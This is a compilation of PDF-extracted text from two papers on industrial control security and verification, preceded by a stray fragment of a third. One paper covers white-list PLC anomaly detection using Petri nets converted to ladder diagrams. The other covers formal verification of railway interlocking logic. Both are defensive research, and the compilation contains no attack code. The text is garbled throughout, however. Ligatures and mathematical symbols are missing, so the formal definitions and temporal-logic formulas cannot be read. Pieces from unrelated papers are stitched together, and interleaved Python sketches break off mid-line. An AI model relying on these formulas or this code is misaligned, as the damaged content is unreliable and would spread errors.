Id}'' denotes a single ``Id'' or a comma-separated ``Id'' sequence. After parsing, ST programs are processed in three phases in accordance with semantic rules. The work ow of KST is illustrated in Figure 6, where FC, FB, and PG represent a function-type POU, a function block-type POU, and a program-type POU, respectively. During each phase, cells in the con guration are populated or modi ed in accordance with semantic rules. Preprocessing phase . In this phase, KST traverses the
On_experimental_verification_of_model_based_white_list_for_PLC_anomaly_detection.pdf
Recently, defensive countermeasures at the controller level have become important because cyber-attacks on control systems are growing rapidly. This paper proposes a white-list anomaly detection method that uses the PLC (Programmable Logic Controller) itself as one such controller-level countermeasure. It introduces a white-list design technique that models the normal behavior of field devices via Petri nets and converts the white-list model into a ladder diagram, allowing the PLC to detect cyber-attacks.
1 I. INTRODUCTION Recently, industrial control system s (ICSs) connect to the internet , PLC (Programmable Logic Controller ) is becoming network communication device introduces [1]. Accordingly , a number of the security incident s such as cyber - and virus -attacks have been reported so far [2][3] . Therefore, it is necessary to apply countermeasures to not only monitoring system and network device but also PLC . The formers are developed based on information security techniques bec ause ICS introduces Windows OS and TCP/IP based network to connect to the internet . On the other hand, the latter case is not the same as the former cases because the firmware of PLC is not always standardization. The previous study propose s an incident detection technique via Petri nets as one of the countermeasure s applicable for PLC [4]. This method focus es on the input -output of the field devices connecting to PLC . The detection method us es the anomaly behavior models which is modeled the field devices via Petri net. That model s can be regarded as pattern file s of black list type antivirus softs. The detection performance of the black list depend s on pattern file s and then requires frequent update of the pattern files to keep the high detection rate , while the black list allows us to identify the category of the security incident . Also , the CPU lo ad depends on the pattern file size when the system checks on the black list . The large size file affect adversely the real time processing performance of PLC, at worst, results in the anomaly behaviors of filed devices. This study focuses a detection method which is based on white list. Reference [5] propose s a white list targeting communications packet s in SCADA ( Supervisory Control And Data Acquisition ). Reference [6] propose s a white list target ing VoIP. These detection methods register the normal operation as lists and detect anomaly operation which is not registered at white list . This detection method does not need to update the list to keep the high detection rate. The CPU load due to check on the white list is lower than on the black list. The update timing of the white list is the system maintenance when the normal op eration of ICS is changed . Therefore , we apply the white list t o the PLC, and aim to detect security incident s appearing on the field device. It is expected that the white list allows PLC to detect the cyber -attack like the virus Stuxnet and PLC Bluster that change the part data of the control program by taking over the normal control command. In this study, we define the list which is registered the behavior of sensor and actuator as a white list. In the first, we model the normal operations via Petri net. Second, we convert the Petri net model to ladder diagram. Ladder diagram is one of the program language which is often used in programming PLC. This method app lies white list on the application program. Therefore, it can add the detection method to the PLC without regard to type of PLC . There are previous studies which propose the way to convert the Petri net model to the ladder diagram [7][8] . Reference [7] proposed the transform method to express the behavior of Petri net by ladder diagram. Converted ladder diagram by this previous study method have only event order information of Petri net. Therefore, it cannot detect the abnormal operations by converted ladder diagram. In this study, we propose the transform method to convert the Petri net model to ladder diagram with constraint condition of Petri net. 
In addition, we add the diagnostic function to the ladder diagram which diagnose whether the meeting constraint condition . Therefore, it can detect the incidents by ladder diagram. In the first, this paper describes the Petri net and ladder diagram. In the next, this paper proposes the transform method which can convert the Petri net model to ladder diagram. Finally, this paper shows the result of verification experiments. On Expe rimental Verification of Model B ased White list for PLC Anomaly D etection Akinori Mochizuki, K enji Sawada, S eiichi Shin, The University of Electro -Communications Shu Hosokawa, Control System Security Center * This work was supported by Council for Science, Technology and Innovation (CSTI), Cross -ministerial Strategic Innovation Promotion Program (SIP), Cyber -Security for Critical Infrastructure (funding agency: NEDO). Akinori Mochizuki is with The University of Electro -Communications, Tokyo, Japan (e -mail: akinori.m@ uec.ac.jp). Kenji Sawada is with The University of Electro -Communications, Tokyo, Japan (e -mail: knj.sawada @ uec.ac.jp). Shin Seiichi is with The University of Electro -Communications, Tokyo, Japan (e -mail: seiichi.shin @ uec.ac.jp). Shu Hosokawa is with Control System Security Center, Miyagi, Japan (e-mail: shu.hosokawa@css -center.or.jp). 2017 11th Asian Control Conference (ASCC) Gold Coast Convention Centre, Australia December 17-20, 2017 978-1-5090-1573-3/17/$31.00 2017 IEEE 1766 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:39 UTC from IEEE Xplore. Restrictions apply. II. MODELING VIA PETRI NET A. Petri net Petri net is a modeling tool which can model the discrete event system [9]. Petri net is bipartite graph composing two nodes class: place and transition. These two nodes are connected by arc. Table I shows the formal definition of Petri net according to [10]. Table I. Formal definition of Petri net Petri net is a 5 -tupple, =( , , , , 0) where: ={ 1, 2, , } is a finite set of places, ={ 1, 2, ,t } is a finite set of transitions, ( ) ( ) is a set of arcs , : {1,2,3, } is a weight function, 0: {0,1,2,3, } is the initial marking, = and P . Petri net structu re =( , , , ) without any specific ini tial marking is denoted by . Petri net with the given initial marking is denoted by ( , 0). Petri nets have asynchronous and concurrency. In addition , Petri nets are applicable for modeling of dynamic state transitions. Therefore, it can visualize the incident dynamic state. The state of the system is represented by the number of tokens which occupy the Place. If the transition is fired, the tokens are removed from input place and ma rked in output place. A transition is enabled if each of its input places contains at least as many tokens as there are arcs from the place to the transition. Petri net model shows system behavior using this firing rule. Let x be a number of marking tokens . Then the following equation (1) is always satisfied. M is an arbitrary natural number s. Graphically, places are represented by circles, transitions by rectangles, arcs by directed arrows, and tokens by small solid circles. Fig. 1 shows the simplest Petri net model. It is necessary to define the meaning of transitions and place, when model the control system via Petri net. Fig.2 shows the self-loop. Self -loop means transition and place are connected by interactive arc. The transition which is connected self -loop can fire only when place has a token. 
Therefore, self -loop can limit the transition firing. In addition, there is an inhibitor arc that limit the transition firing. Fig. 3 shows the inhibitor arc. The transition whic h is connected inhibitor arc can fire only when connecting place has no tokens. B. Timed Petri net Timed Petri net is introduced time concept into the Petri net [11]. Time Petri nets (TPN) are classic Petri nets where each transition is associated with a time interval [ at, bt]. When transition becomes enabled, it cannot fire before at time units have elapsed, and it has to fire no later than bt time units after being enabled. Here at and bt are relative to the point in time when transition last became enabled. The time at is the earliest possible firing time for t ransition and is called earliest firing time of t ransition , and bt is the latest possible firing time for t and is called latest firing time of t ransition . The firing of a transitio n itself does not take up any time. This Timed Petri net can visualize the operation delay by introducing Timed Petri net. Fig. 4 shows the Timed Petri net model. C. The Reason Why t he Petri net Almost the control system is consist ed of field device, sensor and actuator. Therefore, it can be considered that behavior of sensor and actuator to be an actual movement of control system. Hence, if behavior of sensor and actuator can convert to the discrete time, it can model the actual movem ent of control system via Petri net. Previous study [4] considered the modeling FA (Factory Automation) via Petri net. D. The Example of Modeling In this study, as one example, we model the Ball -Sorter control system [10] as shown in Fig.5. The function of Ball-Sorter is sorting balls according to their weight as a normal operation . We use a ping -pong ball as a light ball, and a golf ball as a heavy ball. Fig. 6 shows the schematic of Ball-Sorter. Ball -Sorter has three air cylinders (Cylinder1, Cylinder2, and Cylinder3), one sorting sensor (S -sensor), and three proximity sensors (P -sensor1, P -sensor2, and P-sensor3). When the ball is a ping -pong ball, Ball -Sorter sort the ball to BOX1. When the ball is a golf ball, Ball -Sorter sort the ball to BOX2. M 0 (1) Fig. 1: Petri net Fig. 2: Self -loop Fig. 5: Appearance of Ball -Sorter system Fig. 4 : Timed Petri net Fig. 3: Inhibitor arc 1767 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:39 UTC from IEEE Xplore. Restrictions apply. When model the Ball -sorter, we define that transition firing as ON/OFF operation of actuator and sensor. We m odel the Ball-Sorter so as to represent the event order in normal operation. Fig. 7 shows the Ball -Sorter Petri net model . Table. II and Table. II I shows the names and the meaning of transition and state in Fig. 7. III. LADDER DIAGRAM Ladder diagram is one of programming language that represent a program by a graphical diagram based on the circuit diagrams of relay logic hardware. This ladder diagram s used to develop software for PLC used in control system. Global standardization on PLC based on t he internatio nal standard IEC 61131 -3 is ongoing [1]. PLC based on this international standard can be programmed by FBD (Function Block Diagram), IL (Instruction List), and ST (Structured Text) not only ladder diagram. In this study, we use ladder diagram which is the most common program and FBD which can program the PLC not based on IEC 61131 -3 in most cases. Fig. 6: Schematic of Ball -Sorter control system Table II. 
Transition Transition Meaning behavior Psensor1_on P sensor1 turn ON Psensor2_on P sensor2 turn ON Psensor3_on P sensor3 turn ON Ssensor_off S sensor turn OFF Ssensor_on S sensor turn ON Cylinder1_on Air cylinder 1 turn ON Cylinder1_off Air cylinder 1 turn OFF Cylinder2_on Air cylinder 2 turn ON Cylinder2_off Air cylinder 2 turn OFF Cylinder3_on Air cylinder 3 turn ON Cylinder3_off Air cylinder 3 turn OFF Table III. Place Place Meaning of state buffer Buffer Cylinder1_on Air cylinder 1 ON state Cylinder1_off Air cylinder 1 OFF state Cylinder2_on Air cylinder 2 ON state Cylinder3_on Air cylinder 3 ON state Psensor1_on P sensor 1ON state Psensor2_on P sensor 2ON state Psensor3_on P sensor 3ON state Ssensor1_off S sensor OFF state Ssensor2_on S sensor ON state Fig. 7: Petri net model of Ball -Sorter [0,3] [0,3][0,3] [0,3] [0,3] [0,3] [0,3] [0,3][0, ] [0, ] [0, ]1768 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:39 UTC from IEEE Xplore. Restrictions apply. IV. CONVERT THE PETRI NET TO LADDER D IAGRAM In this section, we propose the way to convert the Petri net model to ladder diagram with a constraint condition of Petri net. As normal operation of Petri net model, when the transition T fired, the marking token x in input place move to the output place following direction of arc F and weight function W. A transition t can fi re only when each input place p of t is marked with at least w (p, t) tokens. Therefore, when abnormal operation of based Petri net model like Fig. 1 is occurred, equation (1) is not satisfied as a result. When equation (1) is not satisfied, it can regard that the abnormal operation of control system is occur red. Accordingly, it can detect the abnormal operation by adding the diagnostic function which diagnose equation (1) not only converting the Petri net to structure ladder diagram. In the light of abnormal operation of self-loop like Fig. 2. This abnormal operation is the transition fire when the place which is connected to self -loop has no marking tokens. Therefore, to detect this abnormal operation by ladder diagram is need to add the diagnostic function which diagnostic the rule of self -loop. In the light of abnormal operation of the model using inhibitor arc like Fig. 3. A transition which is connected to inhibitor arc can fire only when an input place has no marking. Hence, abnormal operation of the model using inhibitor arc is that a transition which is connected to inhibitor arc is fired when an input place has no marking. Therefore, to detect this abnormal operation by ladder diagram is need to add the diagnostic function which diagnostic the rule of inhibitor arc. In the light of abnormal operation of Timed Petri net like Fig. 4. A transition in timed Petri net can fire after a specified Table IV. Petri net and Structuring Ladder Diagram Constructs Petri net Ladder Diagrams Based Petri net Self-loop Inhibitor arc Timed Petri net 1769 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:39 UTC from IEEE Xplore. Restrictions apply. time between at and bt. Therefore, one of the abnormal operation s of timed Petri net is that firing time for transition is not between at and bt. To detect this abnormal operation by ladder diagram is need to add the diagnostic function which diagnostic the rule of timed Petri net. Table. IV shows the example of conversion from Petri net model to ladder diagram. ADD, SUB, LT, GT, EQ and TON are F B. 
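The diagnostic idea behind Table IV can also be sketched in Python as a runtime monitor: each observed sensor or actuator event is treated as a transition firing, the enabledness test implements the w(p, t) condition above, and the anomaly output (the Attack coil of the converted ladder diagram) is raised when an event is outside the white list or when the token constraint of equation (1) is violated after firing. The tiny model below only borrows a few names loosely inspired by Tables II and III; it is an assumed illustration, not the actual Ball-Sorter model or its ladder implementation, and the bound M = 1 is likewise assumed.

```python
# Sketch of the white-list diagnosis in Python instead of ladder logic: every
# observed event must correspond to an enabled transition of the normal-behaviour
# model; otherwise, or if the assumed token bound M of equation (1) is violated
# after firing, the monitor raises the anomaly flag ("Attack").

M = 1   # assumed upper bound on tokens per place

# transition -> (input-place weights, output-place weights); names are illustrative
model = {"Ssensor_on":   ({"buffer": 1}, {"Ssensor_on_state": 1}),
         "Cylinder1_on": ({"Ssensor_on_state": 1}, {"Cylinder1_on_state": 1})}

def monitor(marking, observed_events):
    for event in observed_events:
        arcs = model.get(event)
        if arcs is None or any(marking.get(p, 0) < w for p, w in arcs[0].items()):
            return True                      # event not allowed by the white list
        for p, w in arcs[0].items():         # fire: remove tokens from input places
            marking[p] -= w
        for p, w in arcs[1].items():         # fire: add tokens to output places
            marking[p] = marking.get(p, 0) + w
        if any(x < 0 or x > M for x in marking.values()):
            return True                      # constraint of equation (1) violated
    return False                             # no anomaly detected

print(monitor({"buffer": 1}, ["Ssensor_on", "Cylinder1_on"]))   # False: normal order
print(monitor({"buffer": 1}, ["Cylinder1_on"]))                 # True: out-of-order event
```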
ADD represent an adder. SUB represent a subtractor . LT, GT and EQ represent comparator >, <, =, respectively. TON is an ON delay timer . Number of marking tokens x is defined as integer . It is necessary to discretize input and output of sensor and actuator by using function which differentiate the rise of a signal like Fig. 8, because Petri net is a discrete -time model . Output of ladder diagram Attack is detection output of abnormal opera tion. Turning on the output Attack means that ladder diagram detects the abnormal operations. It can convert the Petri net model to ladder diagram following exa mple in Table. IV , because Petri net model which is shown in Fig. 7 is con stituted of example s in Table. IV. In this study, we converted the Petri net model shown in Fig. 7 to ladder diagram. Space did not permi t us to insert the converted ladder diagram V. EXPERIMENTAL VERIFICA TION In this section, we show the capability of PLC white list by experim ental verification. The experimental used the Ball-sorter shown in Fig. 5. A. Method There are various cyber -attacks m ethod targeting PLC such as propagating through a network or connecting directly . After all, these cyber -attacks make falsification of in ternal variable with PLC or illegal rewriting program. Therefore, w e carry out the following three experiments of normal operation and cyber -attack incident. Exp.(i): Normal operation (no cyber -attack) Exp.(ii): Abnormal output of actuator command Exp.(iii): Falsification of part of a program Normal operation in Exp.(i) is thrown in 4 balls. Table. V shows the ball sequence thrown in Ball -Sorter. In Table. V , P represents Ping -pong ball, and G represents Golf ball. Incident Exp. (ii) is caused by command from e ngineering device. Incident Exp. (iii) is falsification of ladder diagram to sort the golf ball to BOX1. B. Result Fig. 9 -11 shows the time series plot of abnormal output in Exp. (i) -(iv), respectively . Its vertical line shows the anomaly detection output , and the horizontal one the time. Taking anomaly detection output value 1 means that the system detects the abnormal operations. In Exp. (i), PLC did not detect the i ncident, because abnormal output did not take a value 1 in Fig. 9. In Exp. (ii), this result represents that PLC detected t he incident at the 5 second, because abnormal output took a value 1. In Exp. (iii), this result represents that PLC detected the incident at the 8 second, because abnormal output took a value 1. From the result of these experiments, we confirmed the effectiveness of the proposed detection method. Fig. 8: UP contact Table V. Ball sequence Input sequence 1 2 3 4 Ball P G P G Fig. 11: Exp.(iii) Falsification of part of a program Fig. 9: Exp.(i) Normal operation Fig. 10: Exp.(ii) Abnormal output of actuator command 1770 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:39 UTC from IEEE Xplore. Restrictions apply. C. A Load to The PLC In this study, we measured a load to the PLC by white list. Table. VI shows the load to the PL C with and without white list. The total number of steps means the number of lines in ladder diagram. Scan time means the amount of time it takes for the PLC to make one scan cycle. The scan cycle is the cycle of which the PLC gathers the inputs, runs a ladder diagram and then updates the outputs. VI. CONCLUSION We proposed the method to apply a detection function to PLC. 
PLC can have the white list by converting the Petri net model which is modeled the behavior of field device to a ladder diagram. In addition, we verify the capability of proposed detection function through the actual experiment. However, this study method is necessary to model the control system via Petri net manually. It is need the time and costs to model the complicated system. In future, it is necessary the method to model the control system automatically from the logs [12] . REFERENCES [1] http://www.plcopen.org/pages/tc1_standards/iec_61131_3/ [2] Stamatis Karno uskos: Stuxnet Worm Impact on Industrial Cyber -Physical System Security, IECON 2011, pp. 4490 -4494 (Nov. 2011) [3] Stephen McLaughlin, Charalambos Konstantinou: The Cybersecurity Landscape in Industrial Control Systems, Proceedings of the IEEE, Vol.104, No.5, pp. 1039 -1057 (May. 2016) [4] Akinori Mochizuki, Kenji Sawada, Seiichi Shin, Shu Hosokawa: Model -based security incident analysis for control systems via Petri net , AROB 22nd 2017, pp. 170 -175 (Jan. 2017) [5] Woo -suk Jung, Sung -Min Kim, Young -Hoon Goo, Myung -Sup Kim: Whitelist Representation for FTP Service in SCADA system by using Structured ACL Model, APNOMS 2016 18th Asia -Pacific, pp.1 -4 (2016) [6] Eric Y. Chen, Mistutaka Itoh: A Whitelist Approach to Protect SIP Servers from Flooding Attacks, CQR 2010, pp.1 -6 (June, 2010) [7] Shih Sen Peng, Meng Chu Zhou: Ladder Diagram and Petri -Net-Based Discrete -Event Control Design Methods, IEEE Transactions on Systems, Vol.34 523 -531 (2004) [8] M. Uzam, A.H. Jones, and N. Ajlouni: Conversion of Petri net controllers for manufactur ing systems into ladder logic diagrams, EFTA 96, pp.649 -655 (Nov. 1996) [9] T. Murata, Petri Nets: Properties, Analysis and Applications, Proceedings of the IEEE, vol. 77, no. 4, pp.541 -580 (1989) [10] T. Sasaki, A. Mochizuki, K. Sawada, S. Shin, S. Hosokawa: Mode l Based Fallback Control for Networked Control System via Switched Lyapunov Function , IEICE , Vol. E100.A No. 10 pp. 2086 -2094 (2017) [11] Popova -Zeugmann, Louchka. "Timed petri nets." Time and Petri Nets. Springer Berlin Heidelberg, pp.139 -172, (2013) [12] Shingo Ab e, Yohei Tanaka, Yukako Uchida and Shinichi Horata : Tracking Attack Sources based on Traceback Honeypot for ICS Network , SICE Annual Conference 2017 , pp.717 -723, (2017) Table VI. The PLC load Without white list With white list Program size 234.071kB 235.712kB Occupancy rate of program memory 4.23% 4.26% Object size 1.496kB 3.248kB Occupancy rate of object memory 0.04% 0.08% The total number of steps 39 144 Maximum scan time 0.40ms 0.40ms Minimum scan time 0.27ms 0.28ms 1771 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:39 UTC from IEEE Xplore. Restrictions apply.
Formal_Methods_for_Industrial_Interlocking_Verification.pdf
In this paper, we present an overview of research jointly undertaken by the Swansea Railway Verification Group towards verification techniques for automatically checking safety for train control systems. We present a comprehensive modelling of safety principles in first order logic. We conclude by applying verification methods developed by the Swansea Railway Verification Group in order to check the modelled safety principles against a real-world railway interlocking system.
Formal Methods for Industrial Interlocking Veri cation Simon Chadwick Siemens Rail Automation UK Chippenham, UK [email protected] James Computer Science Swansea University Swansea, UK [email protected] Roggenbach Computer Science Swansea University Swansea, UK [email protected] Werner Siemens Rail Automation UK Chippenham, UK [email protected] Index Terms Veri cation; Model-Checking; PLC; Formal Methods in Industry. I. I NTRODUCTION In 2004, the 18th IFIP World Computer Congress identi ed the railway domain as a Grand Challenge of Computing Science because it is of immediate concern and as it provides a set of generic, well-understood problems whose solutions would be transferable to various other application domains, e.g., process control in manufacturing, a.k.a. industry 4.0. A major challenge in the railway domain concerns the veri cation of safety critical components. Here, in particular the so-called interlocking computer plays a signi cant role as it provides essential safety functions for railway signalling. Described in terms of theoretical computer science, an interlocking computer is a relatively simple entity: it can be modelled as a nite automaton, a concept established in the 1960 s; and it can be analyzed through using temporal logic to express safety properties and then applying the technique of model-checking, which as a eld have both been actively researched since the 1980 s. In this paper, we provide proof of concept that these three elds have matured enough to be utilized in an industrial setting. Here, we focus on the challenge of how to make relevant safety properties accessible for model-checking. This is a process that requires the de nition of a bespoke rst order temporal logic. Relative to this logic, we can justify why our veri cation process is correct. Further, we discuss some results that we achieved in a technology transfer project between academics from Swansea University and railway engineers from Siemens Rail Automa- tion UK. This work has been supported by Siemens Rail Automation UK.II. B ACKGROUND An interlocking provides a safety layer for a railway. It interfaces with both the physical track layout and the human (or computerised) controller. The controller issues requests, such as to set a route. Upon such a request, the interlocking will determine if it is safe for the operation to be permitted. If it is safe then the interlocking will issue requests to change the physical track layout, informing the controller of the change. Whereas if it is unsafe, the interlocking will not allow the physical track layout to be changed, and will report back to the controller that the operation has not taken place as it would yield an unsafe situation. Here, we consider TrackGuard WestraceTMinterlockings that execute the following typical control ow: initialise while True do read (Input) (*) State <- Program(Input, State) write (Output) & State <- State After initialisation, there is a non terminating loop con- sisting of three steps: (1) Reading of Input , where Input includes requests from signallers and data from physical track sensors; (2) Internal processing: this depends on the Input as well as on the current State of the controller; Using these the next state State is computed. (3) Committing of Output , which includes passing information back to the signaller, commands to change the physical track layout, as well as an update of the State of the controller. 
Thus, a TrackGuard WestraceTMinterlocking follows the design principles of a so- called Programmable Logic Controller (PLC). In the context of TrackGuard WestraceTMinterlockings, Input ,Output ,State , and State are sets of Boolean variables, where Output is a subset of State . The current con guration of the controller is given by the values of all variables in the sets Input andState . The process step then depends on the current con guration . The TrackGuard WestraceTMinterlocking realises this controller in hardware, where the steps initialise andprocess depend on the installed control software written in ladder logic. A ladder logic program can be translated into a subset of propositional logic. This translation is straightforward: it 978-1-5386-7528-1/18/$31.00 2018 IEEE Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:28 UTC from IEEE Xplore. Restrictions apply. replaces graphical symbols by logical operators, a process which has been automated in [4]. For the rest of the paper we only deal with this representation in propositional logic. III. C APTURING SAFETY PRINCIPLES USING TEMPORAL FIRST ORDER LOGIC In order to perform veri cation of ladder logic programs provided by Siemens, we were required to de ne a set of safety properties. These safety properties describe restrictions in terms of generic elements of the track plan in order to assure some aspect of safety in the system. Each ladder logic program prescribes certain state transi- tions, which relate to real-world actions in the railway system. When implemented for a concrete ladder logic program, each safety property places a restriction on the set of state transitions. The veri cation process will be to check if the state transitions prescribed by the ladder logic program are allowed by the safety property. In order to formulate safety properties, we used a publicly available standards document, Interlocking Principles [5], as the basis for the formation of the safety conditions that will be used in this project. With consideration of the case studies that Siemens Rail Automation UK were providing, it was decided to select a subset of the safety properties in this document for use in our veri cation approaches. Each reference is given as a statement in plain English about the conditions that must hold before a movement authority can be granted. The meanings of the terms used in these statements are detailed in the main body of the Interlocking Principles document. A. A Note on Naming Conventions While the elements of each property are detailed in the body of the Interlocking Principles document, the safety behaviour that is being examined by each reference is open to interpretation. Because of this, further discussion with Siemens Rail Automation UK engineers was required in order to trans- late these English language conditions into observable state transitions within the format of their ladder logic programs. With the understanding gained from our discussions with Siemens Rail Automation UK, it was possible to describe the English safety properties in terms of ladder logic variables. Since these properties are generic, in order to carry out ver- i cation of a particular track layout and ladder logic program each safety property needs to be converted from its generic form into a concrete instance. 
Rather than describing the conditions in a general sense, the concrete forms of the safety properties describe actual elements of the track plan, using the variable names that appear in the ladder logic program. To perform this translation from English references into concrete safety properties, a table of variable names was established in order to substitute speci c variables for the generic elements such as route , signal , or point . This process has the effect of generating many different formulas for a single safety property reference in the table, because a generic route description in English will relate to a number of physical routes in the track plan, each requiringtheir own implementation of the safety property. For example, All train detection devices in the route indicate the line is clear , describes a generic route element in the track plan, and the concept of devices on this route indicating clear. When implementing this safety property for our case study, which contains seven Main class routes, seven propositional formula are required, each describing the safety property in the context of a particular route. B. A Temporal FOL with Built-in Predicates The rst step for implementing concrete safety proper- ties involves moving from English language descriptions of properties as they appear in Interlocking Principles into intermediate generic temporal rst order logic formulae [5]. To describe the original English safety properties in a generic way, we employ a many sorted rst order logic over states and their successors. We consider models at a point of time as: Models :pairs (T;I) whereTis a track plan and Iis a propositional model for all propositional variables of T, e.g.I(P106:RL ) =true=false . In these models, the track plan Tcontains topological information on the railway section, such as the names of all track elements for example Signals, RouteNames, Points, and TrackSegments. It also contains information regarding the layout of these elements, such as which RouteNames originate at which Signal. Thus, the track plan T corresponds to the combination of a visual track layout, labelled with element names, and a route table that describes route and signal information. This topological information does not change over time. The set of propositional variables in Iwould then be formed by the application of variable naming conventions to the track elements in T. These models will be given to us through the execution of the ladder logic programs, with each cycle giving a new model. By looking at subsequent execution cycles of the ladder logic program, from states s0;s1;:::, we can then form se- quences of models that each correspond to a single state of the variables within the ladder logic program. (T;I 0);(T;I 1);::: We then introduce a signature containing: 4 sorts, 3 functions, and unary and binary predicates. Sorts are interpreted in the track plan, for example: Signal T=fS100;:::g:iffT has signals S 100;::: Functions are interpreted in the track plan, for example: routesOf T(s) =fr1;:::;r ng iffin T; signal s has routes r 1;:::;r n Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:28 UTC from IEEE Xplore. Restrictions apply. Unary and binary predicates are interpreted in the track plan for example: p isInCorrectPositionFor T;Ir holds iff Case 1: inT,pneeds to be in reverse for randI (p:RL ) is true. Case 2: ] inT,pneeds to be in normal for r and I(p:NL )is true. 
The unary predicates take an element of a sort as an argument. When instantiated with an element from a sort, the unary predicates interpretation is similar to that of Boolean variables within the ladder logic program. For example, the unary predicate proceed (< Signal > )could be interpreted using a physical signal, say S100. The truth value of this unary predicate is then dependent of the value of the signal in a speci c state. In the ladder logic program, there will be a corresponding Boolean variable that will eventually be used for the interpretation of this predicate. Each unary predicate and argument combination matches a single variable name within the ladder logic, such that the generic formula can be substituted for these variable names at a later stage to produce a concrete formula. In our example signal S100, the corresponding signal proceed variable in the ladder logic is found to be S100.G . In addition to unary predicates, a number of binary pred- icates were also de ned. These binary predicates are solely used to relate Points to RouteNames, and are required due to the unique naming scheme used by points within the ladder logic. When describing the naming of points, in many variable classes, the orientation of the point in uences the pre x or suf x that is used, i.e. whether the point should be in normal or reverse position. Since the required point orientation is information that is state dependent, interpreting a predicate with a track plan T is not suf cient. Instead, these binary predicates must be interpreted using some propositional model I, in which the required point orientations may be evaluated. The required Point orientation will be one of two cases shown in the binary predicate de nition. With the de ned sorts, functions, and unary predicates, it is possible to describe the English safety properties in a generic logical form. By using the forall quanti er over one or more sorts, a generic formulae may be written that formalises the safety property in question. Example: A typical safety property would be: All train detection devices in the route indicate the line is clear , which is one of the principles stated in [5]. Using the convention that a primed predicate denotes the next state, the above safety property can be formalized as: 8s2Signal; rn 2RouteName; t 2TrackSegment : rn2routesOf (s)^t2tracksOf (rn) =) ((not(proceed (s))^proceed0(s)^set(rn)) =) (not(occupied (t)))) Both primed and unprimed symbols are used within this formula, thus referring to two subsequent states this is the temporal aspect of our logic. Therefore, two models are required to evaluate the truth value of this formula. Due to the Fig. 1. A sample trackplan. relation to ladder logic execution, a further restriction must be enforced requiring that these states must be subsequent. For two single models (T;I);(T;I0) a formula holds if: all unprimed symbols are interpreted over (T;I), and all primed symbols are interpreted over (T;I0), and and under these interpretations evaluates to true. For a countable sequence =<(T;I 0);(T;I 1);::: > a formula is true if it holds for each pair (T;Ii);(T;Ii+1); i0: We writej=T for being true over all model sequences with rst component T. C. Semantics Preserving Formula Translation For each generic formula, a translation process was formed that would produce propositional formulae with concrete vari- ables for each of the case studies under inspection. 
Step 1: Replace all universal and existential quanti ers by appropriate conjunctions and disjunctions, respectively, by using the topological information given through the trackplan. The resulting formula will be variable free, as all variables have been replaced by constant symbols corresponding to the nitely many elements of the track plan. Example: For the trackplan in Figure 1, and the safety formula in the last example, we obtain: S100(AM )2routesOf (S100) ^AA2tracksOf (S100(AM )) =) (not(proceed (S100))^proceed0(S100)^ set(S100(AM ))) =) (not(occupied (AA))) ^S100(AM )2routesOf (S106) ^AA2tracksOf (S100(AM )) =) (not(proceed (S106))^proceed0(S106)^ set(S100(AM ))) =) (not(occupied (AA))) ^S100(AM )2routesOf (S110) ^AA2tracksOf (S100(AM )) =) (not(proceed (S110))^proceed0(S110)^ set(S100(AM ))) =) (not(occupied (AA))) ^: : : Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:28 UTC from IEEE Xplore. Restrictions apply. Element Property Pre x Suf x Track Occupied T<SEGMENT> .OCC(IL) Route Set S<SIGNAL(ROUTE)> .U Signal Proceed S<SIGNAL> .G Fig. 2. A typical variable naming scheme. Here, S100(AM) is a route name, S100 is a signal name, and AAis a track name from the trackplan as shown in Figure 1. Step 2: Eliminate true premises; eliminate subformulae with false premises. After Step 1, the formula consists of a number of subformulae joined by conjunctions. Each of these subformulae involves an implication using elements of the xed track plan and its associated route table, relative to which the premise of each every subformula can be evaluated. Example: The rst subformula from the Step 1 example is: S100(AM )2routesOf (S100)^ AA2tracksOf (S100(AM )) =) (not(proceed (S100))^proceed0(S100)^ set(S100(AM ))) =) (not(occupied (AA))) According to the trackplan, the premise of this subformula is true ( S100(AM) is a route that starts at signal S100 ; track AA belongs to route S100(AM) as route S100(AM) starts at signal S100 and ends at signal signal S104 , and track AAis on the path from S100 toS104 as can be seen on the trackplan). Thus, we keep (not(proceed (S100))^proceed0(S100)^ set(S100(AM ))) =)(not(occupied (AA))) from the rst subformula. By examining another subformula resulting from Step 1, a case in which the premise evaluates to false can be found: S100(AM )2routesOf (S106)^ AA2tracksOf (S100(AM )) =) (not(proceed (S106))^proceed0(S106) ^set(S100(AM ))) =) (not(occupied (AA))) Since route 100(AM) is not contained within the routes of signal S106 , the premise of this subformula is false. Thus, we delete the whole subformula. Step 3: Next we replace all predicates with propositional variables according to a variable naming scheme for ladder logic programs. Example: A result of the example in Step 2, was the subformula (not(proceed (S100))^proceed0(S100)^ set(S100(AM ))) =) (not(occupied (AA))) Now we replace the state describing predicates with proposi- tional variables: (not(S100:G)^S100:G0^S100(AM ):U) =) (not(TAA:OCC (IL))) To this end, we apply a variable naming scheme as shown in Figure 2.IV. E XPERIMENTAL RESULTS Over the last decade, Swansea have developed a veri cation tool speci cally for veri cation of ladder logic programs for railway interlockings [3], [4]. This tool is an assortment of software that each handles one aspect of an overall veri cation procedure. For this work, an adaptive maintenance phase took place focusing on adapting the software to support the newly presented format of safety properties. 
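The three translation steps can be mirrored in a few lines of Python: the generic property is expanded over an encoding of a one-route fragment of the example track plan, subformulae with false premises simply never appear because the track plan only lists true relationships, and the naming scheme of Figure 2 yields the concrete propositional formula quoted above. The dictionary encoding of the track plan is an assumption made for this illustration and is not the tool's actual input format.

```python
# Sketch of Steps 1-3 for the property "all train detection devices in the
# route indicate the line is clear", over a one-route fragment of the example
# track plan (route S100(AM) from signal S100 over track AA).

trackplan = {
    "routesOf": {"S100": ["S100(AM)"], "S106": [], "S110": []},  # assumed encoding
    "tracksOf": {"S100(AM)": ["AA"]},
}

def instantiate(plan):
    concrete = []
    for signal, routes in plan["routesOf"].items():   # step 1: expand the quantifiers
        for rn in routes:                             # step 2: false premises vanish,
            for t in plan["tracksOf"][rn]:            # since only true relations are listed
                concrete.append(                      # step 3: apply the naming scheme
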